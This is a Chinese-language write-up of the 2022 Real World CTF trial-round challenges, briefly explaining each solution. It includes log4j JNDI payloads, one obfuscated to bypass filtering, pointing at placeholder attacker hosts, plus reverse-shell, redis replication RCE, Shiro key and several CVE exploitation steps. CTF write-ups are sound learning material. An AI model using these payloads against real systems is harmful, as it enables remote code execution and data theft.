2022 Real World CTF体验赛Writeup

还是太菜了 不配打Real World正赛(神仙打架)，打打体验赛压压惊。

log4flag

提示log4j，测试payload：${jndi:rmi://xxx.dnslog.cn/Exp}

存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}
直接搭建jndi服务，尝试反弹shell

flag:rwctf{d4b4b837f95542aa93b43ee280b230d8}

Be-a-Database-Hacker

根据提示，6379反弹，很明显的redis。
获取题目地址后
测试是否存在未授权访问

很明显存在未授权访问，而且redis版本<5.0.5,这里可以使用redis主从复制进行RCE。


flag:rwctf{c4374dba71fbf50144f7a1a04b7f5837}

the Secrets of Memory

tips很明显了，Spring Boot Actuator的RCE

访问/actuator/env的时候，actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换，以达到脱敏的效果。
而这里提示，flag就是password，而这里的password，已经脱敏。
在目标既不出网，/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下，很多获取被星号脱敏的密码的明文的方法就失效了。
这时候就可以利用 Eclipse Memory Analyzer 来分析 /heapdump 或 /actuator/heapdump 接口下载的 jvm heap 信息，查找密码明文。
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

flag:rwctf{d597d5defdd22829d8587efb9f9d0954}

baby flaglab

考点是Gitlab的一个CVE:CVE-2021-22205,直接echo 写 反弹shell 到 tmp目录 然后赋予执行权限 然后执行就可以。




flag：rwctf{4edb62cb7b37d647e13bfed4f8d4b860}

Ghost shiro

这个环境现在一直起不来，很迷。
讲下解题思路吧，shiro，但不是默认key
首先通过tomcat Ghostcat(CVE-2020-1938)漏洞读取shiro.ini配置文件，得到key：ODN6dDZxNzh5ejB6YTRseg==
接着直接打shiro550漏洞即可。

Flag Console

一个weblogic的CVE-2020-14882，不多说


flag：rwctf{a4c0185ddf2a4e679bd6f1df137c12ba}

Be-a-Database-Hacker 2

H2数据库,搜索一下存在哪些洞

CVE-2021-42392直接打



flag:rwctf{6288999b40cda6a393f247ef82e137e2}

Java Remote Debugger

java debug调试,下载附件：




附件是一些java程序测试代码。
JDWP（Java DEbugger Wire Protocol）：即Java调试线协议，是一个为Java调试而设计的通讯交互协议，它定义了调试器和被调试程序之间传递的信息的格式。如果这个时候就必须开启远程调试功能了，此时就有可能被攻击者利用 RCE。



flag:rwctf{2c0e7100bcb45cc825ca97eccb86e568}